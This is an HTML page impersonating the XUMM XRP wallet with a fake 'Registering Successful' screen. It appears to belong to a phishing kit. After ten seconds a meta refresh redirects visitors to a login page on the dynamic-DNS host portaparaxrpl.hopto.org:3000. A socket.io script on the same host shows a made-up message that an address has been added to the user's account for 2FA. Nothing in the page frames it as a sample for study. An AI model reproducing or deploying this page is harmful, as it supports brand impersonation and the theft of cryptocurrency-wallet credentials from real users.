<!DOCTYPE html>
<html lang="en">
<head>
 <meta charset="UTF-8">
 <meta http-equiv="refresh" content="10; URL=https://portaparaxrpl.hopto.org:3000/login" />
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 
 <title>XUMM Registering Success</title>
 <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png">
 <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.2/css/bootstrap.min.css">
 <link rel="stylesheet" 
 href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css">
 <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.2/css/bootstrap.min.css">
 <link rel="stylesheet" 
 href="//netdna.bootstrapcdn.com/font-awesome/4.0.3/css/font-awesome.min.css">
 <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
   
	
 <style>
  html{
   padding:50px;
  }
 </style>
</head>
<body>
<div class="page-header text-center">
  
 <img src="/images/xummlogo/xumm-logo.svg" class="img-fluid" alt="XUMM Logo"  width=150" height="150">
	</div>			
             
 <div class="container text-center">
  <div class="col-sm-6 col-sm-offset-3">
   <h3>Registering Successful</h3>
  <span id="name"></span>
  </div>
 </div>
</body>

<script src="/socket.io/socket.io.js"></script>
<script>
 

    var socket = io('https://portaparaxrpl.hopto.org:3000');
    

    socket.on('address', function (data) {
    	
    	
    	document.getElementById('name').innerHTML=("XUMM Register Response: " + data + " Address added to you Account for 2FA");
	

    });
    
    </script>

</html>